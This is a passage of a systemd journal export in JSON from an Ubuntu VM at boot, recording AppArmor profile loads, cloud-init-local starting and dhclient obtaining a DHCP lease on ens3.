"SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_PID" : "531", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781984000", "_AUDIT_ID" : "13", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"man_groff\" pid=531 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "man_groff" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=21f;b=e2b08827b5804427b422c10c84f1567e;m=78f2b1;t=5bd16dd3c7217;x=862c7cd4f0fc5f39", "__REALTIME_TIMESTAMP" : "1615280782209559", "__MONOTONIC_TIMESTAMP" : "7926449", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782204000", "_AUDIT_ID" : "14", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine", "_PID" : "533" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=220;b=e2b08827b5804427b422c10c84f1567e;m=78f44a;t=5bd16dd3c73b1;x=add7f7ace0088a9f", "__REALTIME_TIMESTAMP" : "1615280782209969", "__MONOTONIC_TIMESTAMP" : "7926858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" 
: "1615280782204000", "_PID" : "533", "_AUDIT_ID" : "15", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/snapd/snap-confine//mount-namespace-capture-helper\" pid=533 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=221;b=e2b08827b5804427b422c10c84f1567e;m=78fe7c;t=5bd16dd3c7de3;x=d41d5ce55364f408", "__REALTIME_TIMESTAMP" : "1615280782212579", "__MONOTONIC_TIMESTAMP" : "7929468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=222;b=e2b08827b5804427b422c10c84f1567e;m=7aa48e;t=5bd16dd3e23f5;x=98aabf09c000db31", "__REALTIME_TIMESTAMP" : "1615280782320629", "__MONOTONIC_TIMESTAMP" : "8037518", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782316000", "_AUDIT_ID" : "16", "MESSAGE" 
: "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/sbin/tcpdump\" pid=537 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/sbin/tcpdump", "_PID" : "537" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=223;b=e2b08827b5804427b422c10c84f1567e;m=7aa887;t=5bd16dd3e27ee;x=2a93c48fc7221991", "__REALTIME_TIMESTAMP" : "1615280782321646", "__MONOTONIC_TIMESTAMP" : "8038535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : " ...done." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=224;b=e2b08827b5804427b422c10c84f1567e;m=7ab6b5;t=5bd16dd3e361d;x=1364507ad89130f1", "__REALTIME_TIMESTAMP" : "1615280782325277", "__MONOTONIC_TIMESTAMP" : "8042165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "MESSAGE" : "Started AppArmor initialization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782322885" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=225;b=e2b08827b5804427b422c10c84f1567e;m=7abd1b;t=5bd16dd3e3c82;x=2b59fb9d444212bb", "__REALTIME_TIMESTAMP" : "1615280782326914", "__MONOTONIC_TIMESTAMP" : "8043803", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", 
"_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Initial cloud-init job (pre-networking)...", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280782326905" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=226;b=e2b08827b5804427b422c10c84f1567e;m=9dfc2c;t=5bd16dd617b93;x=b24e6efe5fdec21", "__REALTIME_TIMESTAMP" : "1615280784636819", "__MONOTONIC_TIMESTAMP" : "10353708", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "MESSAGE" : "Internet Systems Consortium DHCP Client 4.3.5", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784636742" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=227;b=e2b08827b5804427b422c10c84f1567e;m=9e04cd;t=5bd16dd618434;x=bc3c60b7fa04cd28", "__REALTIME_TIMESTAMP" : "1615280784639028", "__MONOTONIC_TIMESTAMP" : "10355917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", 
"SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Copyright 2004-2016 Internet Systems Consortium.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639018" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=228;b=e2b08827b5804427b422c10c84f1567e;m=9e05da;t=5bd16dd618541;x=b84a43eb2fa58f2e", "__REALTIME_TIMESTAMP" : "1615280784639297", "__MONOTONIC_TIMESTAMP" : "10356186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "All rights reserved.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639288" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=229;b=e2b08827b5804427b422c10c84f1567e;m=9e0677;t=5bd16dd6185de;x=d698504e74ccb48", 
"__REALTIME_TIMESTAMP" : "1615280784639454", "__MONOTONIC_TIMESTAMP" : "10356343", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "For info, please visit https://www.isc.org/software/dhcp/", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639446" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22a;b=e2b08827b5804427b422c10c84f1567e;m=9e0717;t=5bd16dd61867e;x=48ec75f5f0dd229d", "__REALTIME_TIMESTAMP" : "1615280784639614", "__MONOTONIC_TIMESTAMP" : "10356503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf 
/bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784639606" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22b;b=e2b08827b5804427b422c10c84f1567e;m=9e1553;t=5bd16dd6194bb;x=bfb22e643e029b0f", "__REALTIME_TIMESTAMP" : "1615280784643259", "__MONOTONIC_TIMESTAMP" : "10360147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Listening on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643251" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22c;b=e2b08827b5804427b422c10c84f1567e;m=9e15bd;t=5bd16dd619525;x=92236d6c9cf78cdf", "__REALTIME_TIMESTAMP" : "1615280784643365", "__MONOTONIC_TIMESTAMP" : "10360253", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : 
"syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on LPF/ens3/fa:16:3e:55:6a:e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643360" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22d;b=e2b08827b5804427b422c10c84f1567e;m=9e1674;t=5bd16dd6195dc;x=b2891843f03c37b", "__REALTIME_TIMESTAMP" : "1615280784643548", "__MONOTONIC_TIMESTAMP" : "10360436", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "Sending on Socket/fallback", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643541" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22e;b=e2b08827b5804427b422c10c84f1567e;m=9e1705;t=5bd16dd61966c;x=9f3edbe02215b3ff", 
"__REALTIME_TIMESTAMP" : "1615280784643692", "__MONOTONIC_TIMESTAMP" : "10360581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPDISCOVER on ens3 to 255.255.255.255 port 67 interval 3 (xid=0xf379735)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784643686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=22f;b=e2b08827b5804427b422c10c84f1567e;m=9e1dfa;t=5bd16dd619d62;x=29ed3871bd0e37c0", "__REALTIME_TIMESTAMP" : "1615280784645474", "__MONOTONIC_TIMESTAMP" : "10362362", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf 
/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPREQUEST of 192.168.10.95 on ens3 to 255.255.255.255 port 67 (xid=0x3597370f)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645465" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=230;b=e2b08827b5804427b422c10c84f1567e;m=9e1e64;t=5bd16dd619dcc;x=7a44fe3a0b1c8273", "__REALTIME_TIMESTAMP" : "1615280784645580", "__MONOTONIC_TIMESTAMP" : "10362468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPOFFER of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=231;b=e2b08827b5804427b422c10c84f1567e;m=9e25d3;t=5bd16dd61a53a;x=ae1b737a9207c09f", "__REALTIME_TIMESTAMP" : "1615280784647482", "__MONOTONIC_TIMESTAMP" : "10364371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPACK of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784647459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=232;b=e2b08827b5804427b422c10c84f1567e;m=9e9f06;t=5bd16dd621e6d;x=ceca2907bc6d18d2", "__REALTIME_TIMESTAMP" : "1615280784678509", "__MONOTONIC_TIMESTAMP" : "10395398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf 